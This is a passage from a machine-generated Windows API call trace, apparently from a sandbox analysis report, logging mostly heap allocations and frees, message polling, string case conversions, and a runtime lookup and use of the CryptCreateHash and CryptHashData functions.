wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0204.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0204.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0204.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0204.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0204.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0204.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0204.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0204.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0204.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0204.383] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0204.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0204.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0204.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0204.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0204.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0204.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0204.384] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0204.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0204.384] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0204.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0204.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0204.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0204.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0204.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0204.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0204.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0204.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0204.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0204.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0204.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0204.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0204.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0204.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0204.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0204.385] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0204.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0204.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.385] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0204.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0204.385] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0204.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0204.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0204.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0204.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0204.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0204.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0204.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.385] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0204.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0204.385] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0204.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0204.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0204.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0204.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0204.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0204.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0204.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0204.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0204.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0204.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0204.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0204.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0204.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0204.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0204.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0204.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0204.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0204.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0204.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0204.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0204.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0204.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0204.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0204.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0204.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0204.387] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0204.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0204.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0204.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0204.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0204.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0204.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0204.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0204.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0204.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x24a95b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0204.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0204.389] GetProcAddress (hModule=0x74d40000, lpProcName="CryptCreateHash") returned 0x74d4df4e [0204.389] CryptCreateHash (in: hProv=0xad2698, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0204.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0204.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0204.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0204.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0204.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0204.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0204.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0204.389] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0204.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0204.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0204.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0204.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0204.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0204.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0204.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0204.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0204.390] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.390] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0204.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0204.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0204.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0204.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0204.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0204.390] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0204.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0204.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0204.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0204.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0204.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0204.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0204.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0204.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0204.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0204.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0204.391] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0204.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0204.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0204.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0204.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0204.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0204.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0204.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0204.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0204.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0204.391] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0204.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0204.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0204.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0204.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0204.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0204.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0204.391] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0204.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0204.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0204.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0204.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0204.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0204.392] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0204.392] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0204.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0204.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0204.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0204.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0204.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0204.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0204.392] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0204.392] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0204.392] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0204.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0204.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0204.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0204.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0204.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0204.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0204.392] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0204.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0204.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0204.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0204.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0204.393] CryptHashData (hHash=0xaa5660, pbData=0x24b1468, dwDataLen=0x3, dwFlags=0x1) returned 1 [0204.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0204.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0204.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0204.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0204.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0204.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0204.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0204.393] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0204.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0204.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0204.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0204.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0204.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0204.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0204.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0204.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0204.394] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.394] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0204.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0204.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0204.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0204.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0204.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0204.394] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0204.394] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 